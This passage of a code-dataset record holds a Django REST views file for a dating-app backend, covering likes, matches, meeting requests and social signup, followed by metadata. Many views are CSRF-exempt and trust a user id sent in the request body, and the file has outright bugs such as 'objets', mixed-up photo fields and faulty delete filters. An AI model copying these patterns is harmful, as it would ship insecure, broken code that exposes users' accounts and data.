from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=to_user_name,\n notification_type='Match Notification',\n notification_title='Match Notification',\n notification_body=\"You have been matched with \" + from_user_name\n )\n return Response({\"You have matched with a user\"}, status=HTTP_200_OK)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass SuperLikeUserAPIView(CreateAPIView):\n model = MatchedUser\n serializer_class = SuperLikeSerializer\n\n def post(self, request, *args, **kwargs):\n logged_in_user_id = self.request.data['id']\n users_super_liked_me = MatchedUser.objects.filter(\n super_liked_by_me=logged_in_user_id)\n users_super_liked_me_list = []\n for obj in users_super_liked_me:\n y = obj.user.id\n users_super_liked_me_list.append(y)\n super_liked_by_me = self.request.data['super_liked_by_me']\n if int(super_liked_by_me) not in users_super_liked_me_list:\n register_user = RegisterUser.objects.get(id=logged_in_user_id)\n from_user_name = register_user.first_name\n user = MatchedUser.objects.create(\n user=register_user, super_matched='No')\n user.super_liked_by_me.add(super_liked_by_me)\n to_user_id = RegisterUser.objects.get(id=super_liked_by_me)\n to_user_name = to_user_id.first_name\n InAppNotification.objects.create(\n from_user_id=register_user,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=to_user_name,\n notification_type='Like Notification',\n notification_title='Like Notification',\n notification_body=\"You have been super liked by \" + from_user_name\n )\n return Response({\"You have super liked a user\"}, status=HTTP_200_OK)\n else:\n super_liked_by_me = self.request.data['super_liked_by_me']\n register_user = RegisterUser.objects.get(id=logged_in_user_id)\n from_user_name = register_user.first_name\n user = MatchedUser.objects.create(\n user=register_user, super_matched='Yes')\n user.super_liked_by_me.add(super_liked_by_me)\n to_user_id = RegisterUser.objects.get(id=super_liked_by_me)\n to_user_name = to_user_id.first_name\n InAppNotification.objects.create(\n from_user_id=register_user,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=to_user_name,\n notification_type='Match Notification',\n notification_title='Match Notification',\n notification_body=\"You have matched with \" + from_user_name\n )\n return Response({\"You have super matched with a user\"}, status=HTTP_200_OK)\n\n\nclass GetMatchesAPIView(ListAPIView):\n model = MatchedUser\n serializer_class = MatchedUserSerializer\n\n def get(self, request, *args, **kwargs):\n user_id = self.request.data['user_id']\n liked_me = MatchedUser.objects.filter(\n liked_by_me=user_id).exclude(user=user_id).distinct()\n liked_me_list = [obj.user.first_name for obj in liked_me]\n liked_by_me = MatchedUser.objects.filter(user=user_id).distinct()\n liked_by_me_list = []\n for obj in liked_by_me:\n y = obj.liked_by_me.all()\n for z in y:\n liked_by_me_list.append(z.first_name)\n super_liked_me = MatchedUser.objects.filter(\n super_liked_by_me=user_id).exclude(user=user_id).distinct()\n super_liked_by_me = MatchedUser.objects.filter(user=user_id).distinct()\n super_liked_me_list = [x.user.first_name for x in super_liked_me]\n super_liked_by_me_list = []\n for obj in super_liked_by_me:\n y = obj.super_liked_by_me.all()\n for z in y:\n super_liked_by_me_list.append(z.first_name)\n match = []\n super_match = []\n x = set(liked_by_me_list) & set(liked_me_list)\n match.append(x)\n y = set(super_liked_me_list) & set(super_liked_by_me_list)\n super_match.append(y)\n return Response({\"Matches\": match, \"Super Matches\": super_match}, status=HTTP_200_OK)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass DeleteMatchesAPIView(APIView):\n model = MatchedUser\n serializer_class = DeleteMatchSerializer\n\n def get(self, request, *args, **kwargs):\n logged_in_user_id = self.request.data['id']\n liked_by_me = MatchedUser.objects.filter(\n liked_by_me=logged_in_user_id).values()\n return Response({\"LikedUsers\": liked_by_me}, status=HTTP_200_OK)\n\n def post(self, request, *args, **kwargs):\n data = self.request.data\n liked = self.request.data['liked_by_me']\n logged_in_user_id = self.request.data['id']\n liked_by_me = MatchedUser.objects.filter(liked_by_me=logged_in_user_id)\n liked = int(liked)\n x = []\n for obj in liked_by_me:\n y = obj.user.id\n x.append(y)\n if liked and liked in x:\n MatchedUser.objects.filter(liked_by_me=liked).delete()\n return Response({\"User removed successfully\"}, status=HTTP_200_OK)\n else:\n return Response({\"Cannot be removed. User is not a match\"}, status=HTTP_400_BAD_REQUEST)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass DeleteSuperMatchesAPIView(APIView):\n model = MatchedUser\n serializer_class = DeleteSuperMatchSerializer\n\n def get(self, request, *args, **kwargs):\n data = self.request.data\n logged_in_user_id = self.request.data['id']\n super_liked_by_me = MatchedUser.objects.filter(\n super_liked_by_me=logged_in_user_id).values()\n return Response({\"SuperLiked Users\": super_liked_by_me}, status=HTTP_200_OK)\n\n def post(self, request, *args, **kwargs):\n data = self.request.data\n # id = self.request.data['id']\n logged_in_user_id = self.request.data['id']\n super_liked = self.request.data['super_liked_by_me']\n super_liked_by_me = MatchedUser.objects.filter(\n super_liked_by_me=logged_in_user_id)\n super_liked = int(super_liked)\n x = []\n for obj in super_liked_by_me:\n y = obj.user.id\n x.append(y)\n if super_liked and super_liked in x:\n MatchedUser.objects.filter(super_liked_by_me=super_liked).delete()\n return Response({\"User removed successfully\"}, status=HTTP_200_OK)\n else:\n return Response({\"User cannot be removed. User is not a super match\"}, status=HTTP_400_BAD_REQUEST)\n\n\n@method_decorator(csrf_exempt, name='dispatch')\nclass RequestMeetingAPIView(CreateAPIView):\n model = RequestMeeting\n serializer_class = RequestMeetingSerializer\n\n def post(self, request, *args, **kwargs):\n print('_____________', self.request.data)\n phone_number = self.request.data['phone_number']\n logged_in_user_id = self.request.data['id']\n requested_user = RegisterUser.objects.get(id=phone_number)\n from_id = logged_in_user_id\n from_user_id = RegisterUser.objects.get(id=from_id)\n from_user_name = from_user_id.first_name\n phone_number = self.request.data['phone_number']\n to_user = RegisterUser.objects.get(id=phone_number)\n first_name = to_user.first_name\n to_id = self.request.data['phone_number']\n to_user_id = RegisterUser.objects.get(id=to_id)\n liked_by_me = MatchedUser.objects.filter(liked_by_me=logged_in_user_id)\n super_liked_by_me = MatchedUser.objects.filter(\n super_liked_by_me=logged_in_user_id)\n liked_by = MatchedUser.objects.filter(liked_by=logged_in_user_id)\n super_liked_by = MatchedUser.objects.filter(\n super_liked_by=logged_in_user_id)\n liked_by_list = [x.id for x in liked_by]\n super_liked_by_list = [x.id for x in super_liked_by]\n liked_by_me_list = [x.id for x in liked_by_me]\n super_liked_by_me_list = [x.id for x in super_liked_by_me]\n if requested_user in liked_by_list and requested_user in liked_by_me_list:\n RequestMeeting.objects.create(\n phone_number=requested_user\n )\n InAppNotification.objects.create(\n from_user_id=from_user_id,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=first_name,\n notification_type=\"Meeting\",\n notification_title=\"Meeting request\",\n notification_body=\"You have a meeting request from \" + first_name\n\n )\n return Response({\"Request sent successfully\"}, status=HTTP_200_OK)\n else:\n return Response({\"Cannot send request as the user is not a match\"}, status=HTTP_400_BAD_REQUEST)\n\n\nclass MeetingStatusAPIView(UpdateAPIView):\n model = RequestMeeting\n serializer_class = MeetingStatusSerializer\n queryset = RequestMeeting.objects.all()\n\n def update(self, request, *args, **kwargs):\n instance = self.get_object()\n instance.status = request.data.get(\"status\")\n instance.save(update_fields=['status'])\n logged_in_user_id = self.request.data['id']\n from_id = logged_in_user_id\n from_user_id = RegisterUser.objects.get(id=from_id)\n from_user_name = from_user_id.first_name\n phone_number = self.request.data['phone_number']\n to_user = RegisterUser.objects.get(id=phone_number)\n first_name = to_user.first_name\n to_id = self.request.data['phone_number']\n to_user_id = RegisterUser.objects.get(id=to_id)\n status = self.request.data['status']\n\n InAppNotification.objects.create(\n from_user_id=from_user_id,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=first_name,\n notification_type='Meeting Status',\n notification_title='Meeting Status Update',\n notification_body='Your meeting request status with ' +\n from_user_name + ' has changed to ' + status\n )\n return Response({\"Meeting status has been updated successfully\"}, status=HTTP_200_OK)\n\n\nclass ScheduleMeetingAPIView(CreateAPIView):\n model = ScheduleMeeting\n serializer_class = ScheduleMeetingSerializer\n\n def post(self, request, *args, **kwargs):\n phone_number = self.request.data['phone_number']\n logged_in_user_id = self.request.data['id']\n requested_user = RegisterUser.objects.get(id=phone_number)\n scheduled_by = RegisterUser.objects.get(id=logged_in_user_id)\n meeting_date = self.request.data['meeting_date']\n meeting_time = self.request.data['meeting_time']\n venue = self.request.data['venue']\n description = self.request.data['description']\n status = self.request.data['status']\n from_id = logged_in_user_id\n from_user_id = RegisterUser.objects.get(id=from_id)\n from_user_name = from_user_id.first_name\n phone_number = self.request.data['phone_number']\n to_user = RegisterUser.objects.get(id=phone_number)\n first_name = to_user.first_name\n to_id = self.request.data['phone_number']\n to_user_id = RegisterUser.objects.get(id=to_id)\n if logged_in_user_id.gender == 'Female':\n ScheduleMeeting.objects.create(\n scheduled_with=requested_user,\n scheduled_by=scheduled_by,\n meeting_date=meeting_date,\n meeting_time=meeting_time,\n venue=venue,\n description=description,\n status=status\n )\n InAppNotification.objects.create(\n from_user_id=from_user_id,\n from_user_name=from_user_name,\n to_user_id=to_user_id,\n to_user_name=first_name,\n notification_type='Meeting Schedule',\n notification_title='Meeting Schedule Request',\n notification_body='You have a meeting scheduled with ' + from_user_name\n )\n return Response({\"Meeting schedule sent successfully\"}, status=HTTP_200_OK)\n else:\n return Response({\"Only females are allowed to sent meeting request\"}, status=HTTP_400_BAD_REQUEST)\n\n\nclass FeedbackApiView(CreateAPIView):\n model = Feedback\n serializer_class = FeedbackSerializer\n\n\nclass ContactUsApiView(ListCreateAPIView):\n model = ContactUs\n serializer_class = ContactUsSerializer\n queryset = ContactUs.objects.all()\n\n\nclass AboutUsApiView(ListCreateAPIView):\n model = AboutUs\n serializer_class = AboutUsSerializer\n queryset = AboutUs.objects.all()\n\n\nclass EditAboutUsAPIView(UpdateAPIView):\n model = AboutUs\n serializer_class = AboutUsSerializer\n queryset = AboutUs.objects.all()\n\n\nclass EditContactUsApiView(UpdateAPIView):\n model = ContactUs\n serializer_class = ContactUsSerializer\n queryset = ContactUs.objects.all()\n\n\nclass FacebookSignupApiView(CreateAPIView):\n serializer_class = SocialUserSerializer\n\n def post(self, request, *args, **kwargs):\n email = self.request.POST.get('email' or None)\n phone_number = self.request.POST.get('phone_number' or None)\n first_name = self.request.data['first_name']\n last_name = self.request.data['last_name']\n gender = self.request.data['gender']\n date_of_birth = self.request.data['date_of_birth']\n pic_1 = self.request.POST.get('pic_1' or None)\n pic_2 = self.request.POST.get('pic_2' or None)\n pic_3 = self.request.POST.get('pic_3' or None)\n pic_4 = self.request.POST.get('pic_4' or None)\n pic_5 = self.request.POST.get('pic_5' or None)\n pic_6 = self.request.POST.get('pic_6' or None)\n pic_7 = self.request.POST.get('pic_7' or None)\n pic_8 = self.request.POST.get('pic_8' or None)\n pic_9 = self.request.POST.get('pic_9' or None)\n user_email = RegisterUser.objets.get(email=email)\n user_phone_number = RegisterUser.objects.get(phone_number=phone_number)\n if user_email:\n return Response(\n {\"message\": \"User with this email already exists\", \"flag\": 2, \"status\": HTTP_400_BAD_REQUEST})\n elif user_phone_number:\n return Response(\n {\"message\": \"User with this phone number already exists\", \"flag\": 2, \"status\": HTTP_400_BAD_REQUEST})\n else:\n user = RegisterUser.objects.create(\n email=email,\n phone_number=phone_number,\n first_name=first_name,\n last_name=last_name,\n gender=gender,\n date_of_birth=date_of_birth,\n pic_1=pic_1,\n pic_2=pic_2,\n pic_3=pic_3,\n pic_4=pic_4,\n pic_5=pic_5,\n pic_6=pic_6,\n pic_7=pic_7,\n pic_8=pic_8,\n pic_9=pic_9,\n )\n user_detail = UserDetail.objects.create(\n phone_number=user\n )\n user_data = RegisterUser.objects.get(phone_number=phone_number)\n if user_data.pic_1:\n pic_1 = user_data.pic_1.url\n else:\n pic_1 = ''\n if user_data.pic_2:\n pic_2 = user_data.pic_2.url\n else:\n pic_2 = ''\n if user_data.pic_3:\n pic_3 = user_data.pic_3.url\n else:\n pic_3 = ''\n if user_data.pic_4:\n pic_4 = user_data.pic_4.url\n else:\n pic_4 = ''\n if user_data.pic_5:\n pic_5 = user_data.pic_5.url\n else:\n pic_5 = ''\n if user_data.pic_6:\n pic_6 = user_data.pic_6.url\n else:\n pic_7 = ''\n if user_data.pic_8:\n pic_8 = user_data.pic_8.url\n else:\n pic_8 = ''\n if user_data.pic_9:\n pic_9 = user_data.pic_9.url\n else:\n pic_9 = ''\n Data = {\n \"id\": user_data.id,\n \"email\": user_data.email,\n \"first_name\": user_data.first_name,\n \"last_name\": user_data.last_name,\n \"phone_number\": user_data.phone_number,\n \"gender\": user_data.gender,\n \"date_of_birth\": user_data.date_of_birth,\n \"job_profile\": user_data.job_profile,\n \"company_name\": user_data.company_name,\n \"qualification\": user_data.qualification,\n \"relationship_status\": user_data.relationship_status,\n \"interests\": user_data.interests,\n \"fav_quote\": user_data.fav_quote,\n \"pic_1\": pic_1,\n \"pic_2\": pic_2,\n \"pic_3\": pic_3,\n \"pic_4\": pic_4,\n \"pic_5\": pic_5,\n \"pic_6\": pic_6,\n \"pic_7\": pic_7,\n \"pic_8\": pic_8,\n \"pic_9\": pic_9,\n }\n return Response({\"User\": \"User Created successfully\", \"Data\": Data, \"status\": HTTP_200_OK, \"flag\": 1})\n\n\nclass GoogleSignupView(CreateAPIView):\n serializer_class = SocialUserSerializer\n\n def post(self, request, *args, **kwargs):\n email = self.request.POST.get('email' or None)\n phone_number = self.request.POST.get('phone_number' or None)\n first_name = self.request.data['first_name']\n last_name = self.request.data['last_name']\n gender = self.request.data['gender']\n date_of_birth = self.request.data['date_of_birth']\n pic_1 = self.request.POST.get('pic_1' or None)\n pic_2 = self.request.POST.get('pic_2' or None)\n pic_3 = self.request.POST.get('pic_3' or None)\n pic_4 = self.request.POST.get('pic_4' or None)\n pic_5 = self.request.POST.get('pic_5' or None)\n pic_6 = self.request.POST.get('pic_6' or None)\n pic_7 = self.request.POST.get('pic_7' or None)\n pic_8 = self.request.POST.get('pic_8' or None)\n pic_9 = self.request.POST.get('pic_9' or None)\n user_email = RegisterUser.objets.get(email=email)\n user_phone_number = RegisterUser.objects.get(phone_number=phone_number)\n if user_email:\n return Response(\n {\"message\": \"User with this email already exists\", \"flag\": 2, \"status\": HTTP_400_BAD_REQUEST})\n elif user_phone_number:\n return Response(\n {\"message\": \"User with this phone number already exists\", \"flag\": 2, \"status\": HTTP_400_BAD_REQUEST})\n else:\n user = RegisterUser.objects.create(\n email=email,\n phone_number=phone_number,\n first_name=first_name,\n last_name=last_name,\n gender=gender,\n date_of_birth=date_of_birth,\n pic_1=pic_1,\n pic_2=pic_2,\n pic_3=pic_3,\n pic_4=pic_4,\n pic_5=pic_5,\n pic_6=pic_6,\n pic_7=pic_7,\n pic_8=pic_8,\n pic_9=pic_9,\n )\n user_detail = UserDetail.objects.create(\n phone_number=user\n )\n user_data = RegisterUser.objects.get(phone_number=phone_number)\n if user_data.pic_1:\n pic_1 = user_data.pic_1.url\n else:\n pic_1 = ''\n if user_data.pic_2:\n pic_2 = user_data.pic_2.url\n else:\n pic_2 = ''\n if user_data.pic_3:\n pic_3 = user_data.pic_3.url\n else:\n pic_3 = ''\n if user_data.pic_4:\n pic_4 = user_data.pic_4.url\n else:\n pic_4 = ''\n if user_data.pic_5:\n pic_5 = user_data.pic_5.url\n else:\n pic_5 = ''\n if user_data.pic_6:\n pic_6 = user_data.pic_6.url\n else:\n pic_7 = ''\n if user_data.pic_8:\n pic_8 = user_data.pic_8.url\n else:\n pic_8 = ''\n if user_data.pic_9:\n pic_9 = user_data.pic_9.url\n else:\n pic_9 = ''\n Data = {\n \"id\": user_data.id,\n \"email\": user_data.email,\n \"first_name\": user_data.first_name,\n \"last_name\": user_data.last_name,\n \"phone_number\": user_data.phone_number,\n \"gender\": user_data.gender,\n \"date_of_birth\": user_data.date_of_birth,\n \"job_profile\": user_data.job_profile,\n \"company_name\": user_data.company_name,\n \"qualification\": user_data.qualification,\n \"relationship_status\": user_data.relationship_status,\n \"interests\": user_data.interests,\n \"fav_quote\": user_data.fav_quote,\n \"pic_1\": pic_1,\n \"pic_2\": pic_2,\n \"pic_3\": pic_3,\n \"pic_4\": pic_4,\n \"pic_5\": pic_5,\n \"pic_6\": pic_6,\n \"pic_7\": pic_7,\n \"pic_8\": pic_8,\n \"pic_9\": pic_9,\n }\n return Response({\"User\": \"User Created successfully\", \"Data\": Data, \"status\": HTTP_200_OK, \"flag\": 1})\n\n\nclass PopNotificationAPIView(CreateAPIView):\n serializer_class = PopUpNotificationSerializer\n\n def post(self, request, *args, **kwargs):\n return Response({\"You have updated your meeting status successfully\"}, status=HTTP_200_OK)\n\n\nclass SubscriptionPlanAPIView(ListAPIView):\n serializer_class = SubscriptionPlanSerializer\n queryset = SubscriptionPlans.objects.all()\n\n # def get(self, request, *args, **kwargs):\n # queryset = SubscriptionPlans.objects.all().values()\n # return Response(queryset)\n #\n # def post(self, request, *args, **kwargs):\n # return Response({\"You have updated your meeting request successfully\"}, status=HTTP_200_OK)\n\n\n# class GetScheduledMeeting(APIView):\n#\n# def get(self, request, *args, **kwargs):\n# liked_obj = MatchedUser.objects.filter(matched='Yes')\n# for obj in liked_obj:\n# print('<<<<<--------->>>>', obj.user)\n# print('--------->>>>', obj.liked_by_me.all()[0])\n# liked_by = RegisterUser.objects.get(id=obj.user.id)\n# liked_user = RegisterUser.objects.get(id=obj.liked_by_me.all()[0].id)\n# print('...........................', obj.matched_at.date())\n# print('>>>>>>>>>>>>>>>', liked_by.first_name)\n# print('<<<<<<<<<<<<<<<<<<<<<<<<<<<<,', liked_user.first_name)\n# schedule_obj = ScheduleMeeting.objects.filter(\n# Q(scheduled_by__exact=obj.user.id) & Q(scheduled_with__exact=obj.liked_by_me.all()[0].id) & Q(\n# status__icontains='Not Completed')).values()\n# if schedule_obj:\n# for s_obj in schedule_obj:\n# meeting_at = s_obj['created_at']\n# m_date = str(meeting_at.date()).split('-')\n# meeting_year = int(m_date[0])\n# meeting_month = int(m_date[1])\n# meeting_date = int(m_date[2])\n# meeting_at = date(meeting_year, meeting_month, meeting_date)\n# matched_at = str(obj.matched_at.date()).split('-')\n# matched_year = int(matched_at[0])\n# matched_month = int(matched_at[1])\n# matched_date = int(matched_at[2])\n# matched_at = date(matched_year, matched_month, matched_date)\n# delta = matched_at - meeting_at\n# print(delta.days)\n# if delta.days > 30:\n# obj.delete()\n# return Response({\"Objects\": schedule_obj}, status=HTTP_200_OK)\n\n\nclass GetMediaContent(APIView):\n def get(self, request, *args, **kwargs):\n # os.path.isdir(\"media\")\n # os.chdir(\"media\")\n for path, dirs, files in os.walk(\"media\"):\n for filename in files:\n print(os.path.join(path, filename))\n for f in os.listdir(\"media\"):\n print('------>>>')\n print(f)\n return Response({\"sdgfsgjas\"})\n", "sub_path": "Desktop/Maclo-datingapp-gitlab/datting-app_backend/src/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 62102, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "code-starcoder2", "pt": "13", "api": [{"api_name": "django.contrib.auth.get_user_model", "line_number": 25, "usage_type": "call"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 29, "usage_type": "name"}, {"api_name": "serializers.RegisterSerializer", "line_number": 30, "usage_type": "name"}, {"api_name": "serializers.RegisterSerializer", "line_number": 33, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects.filter", "line_number": 57, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 57, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 57, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 61, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 62, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.create", "line_number": 64, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 64, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 64, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.create", "line_number": 89, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 89, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 89, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 97, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 97, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 97, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 154, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 155, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 28, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 28, "usage_type": "argument"}, {"api_name": "rest_framework.generics.UpdateAPIView", "line_number": 178, "usage_type": "name"}, {"api_name": "serializers.RegisterSerializer", "line_number": 179, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.all", "line_number": 180, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 180, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 180, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 188, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 188, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 188, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 191, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 191, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 191, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 194, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 194, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 194, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 195, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 195, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 195, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 204, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 204, "usage_type": "name"}, {"api_name": "rest_framework.generics.ListCreateAPIView", "line_number": 208, "usage_type": "name"}, {"api_name": "models.UserDetail", "line_number": 209, "usage_type": "name"}, {"api_name": "serializers.UserDetailSerializer", "line_number": 210, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.get", "line_number": 214, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 214, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 214, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 299, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 299, "usage_type": "argument"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 207, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 207, "usage_type": "argument"}, {"api_name": "rest_framework.generics.UpdateAPIView", "line_number": 302, "usage_type": "name"}, {"api_name": "serializers.UserDetailSerializer", "line_number": 303, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.all", "line_number": 304, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 304, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 304, "usage_type": "name"}, {"api_name": "models.SubscriptionPlans.objects.get", "line_number": 334, "usage_type": "call"}, {"api_name": "models.SubscriptionPlans.objects", "line_number": 334, "usage_type": "attribute"}, {"api_name": "models.SubscriptionPlans", "line_number": 334, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 343, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 343, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 343, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 346, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 346, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 346, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 349, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 349, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 349, "usage_type": "name"}, {"api_name": "models.InAppNotification.objects.create", "line_number": 350, "usage_type": "call"}, {"api_name": "models.InAppNotification.objects", "line_number": 350, "usage_type": "attribute"}, {"api_name": "models.InAppNotification", "line_number": 350, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 360, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 360, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 363, "usage_type": "name"}, {"api_name": "serializers.GetInstagramPicSerializer", "line_number": 364, "usage_type": "name"}, {"api_name": "instaloader.Instaloader", "line_number": 369, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 377, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 377, "usage_type": "name"}, {"api_name": "instaloader.Profile.from_username", "line_number": 378, "usage_type": "call"}, {"api_name": "instaloader.Profile", "line_number": 378, "usage_type": "attribute"}, {"api_name": "os.listdir", "line_number": 388, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 394, "usage_type": "call"}, {"api_name": "os.path", "line_number": 394, "usage_type": "attribute"}, {"api_name": "shutil.rmtree", "line_number": 395, "usage_type": "call"}, {"api_name": "rest_framework.response.Response", "line_number": 397, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 398, "usage_type": "name"}, {"api_name": "rest_framework.generics.CreateAPIView", "line_number": 402, "usage_type": "name"}, {"api_name": "serializers.UserInstagramSerializer", "line_number": 403, "usage_type": "name"}, {"api_name": "models.RegisterUser.objects.get", "line_number": 407, "usage_type": "call"}, {"api_name": "models.RegisterUser.objects", "line_number": 407, "usage_type": "attribute"}, {"api_name": "models.RegisterUser", "line_number": 407, "usage_type": "name"}, {"api_name": "models.UserInstagramPic.objects.create", "line_number": 418, "usage_type": "call"}, {"api_name": "models.UserInstagramPic.objects", "line_number": 418, "usage_type": "attribute"}, {"api_name": "models.UserInstagramPic", "line_number": 418, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 432, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_201_CREATED", "line_number": 433, "usage_type": "name"}, {"api_name": "django.utils.decorators.method_decorator", "line_number": 401, "usage_type": "call"}, {"api_name": "django.views.decorators.csrf.csrf_exempt", "line_number": 401, "usage_type": "argument"}, {"api_name": "rest_framework.generics.ListAPIView", "line_number": 436, "usage_type": "name"}, {"api_name": "serializers.ShowInstaPics", "line_number": 437, "usage_type": "name"}, {"api_name": "models.UserInstagramPic.objects.get", "line_number": 442, "usage_type": "call"}, {"api_name": "models.UserInstagramPic.objects", "line_number": 442, "usage_type": "attribute"}, {"api_name": "models.UserInstagramPic", "line_number": 442, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 466, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 466, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 468, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_400_BAD_REQUEST", "line_number": 468, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 471, "usage_type": "name"}, {"api_name": "models.UserDetail", "line_number": 472, "usage_type": "name"}, {"api_name": "serializers.UserDetailSerializer", "line_number": 473, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.all", "line_number": 483, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 483, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 483, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.all", "line_number": 484, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 484, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 484, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 605, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 605, "usage_type": "argument"}, {"api_name": "rest_framework.response.Response", "line_number": 607, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 607, "usage_type": "name"}, {"api_name": "rest_framework.views.APIView", "line_number": 610, "usage_type": "name"}, {"api_name": "models.UserDetail", "line_number": 611, "usage_type": "name"}, {"api_name": "serializers.UserDetailSerializer", "line_number": 612, "usage_type": "name"}, {"api_name": "models.UserDetail.objects.filter", "line_number": 617, "usage_type": "call"}, {"api_name": "models.UserDetail.objects", "line_number": 617, "usage_type": "attribute"}, {"api_name": "models.UserDetail", "line_number": 617, "usage_type": "name"}, {"api_name": "django.utils.timezone.now", "line_number": 627, "usage_type": "call"}, {"api_name": "django.utils.timezone", "line_number": 627, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 746, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 746, "usage_type": "name"}, {"api_name": "rest_framework.response.Response", "line_number": 747, "usage_type": "call"}, {"api_name": "rest_framework.status.HTTP_200_OK", "line_number": 747, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.FilterSet", "line_number": 750, "usage_type": "attribute"}, {"api_name": "django_filters.rest_framework", "line_number": 750, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.CharFilter", "line_number": 751, "usage_type": "call"}, {"api_name": "django_filters.rest_framework", "line_number": 751, "usage_type": "name"}, {"api_name": "django_filters.rest_framework.CharFilter", "line_number": 752, "usage_type": "call"}, {"api_name": "django_filters.rest_framework", "line_number": 752, "usage_type": "name"}, {"api_name": 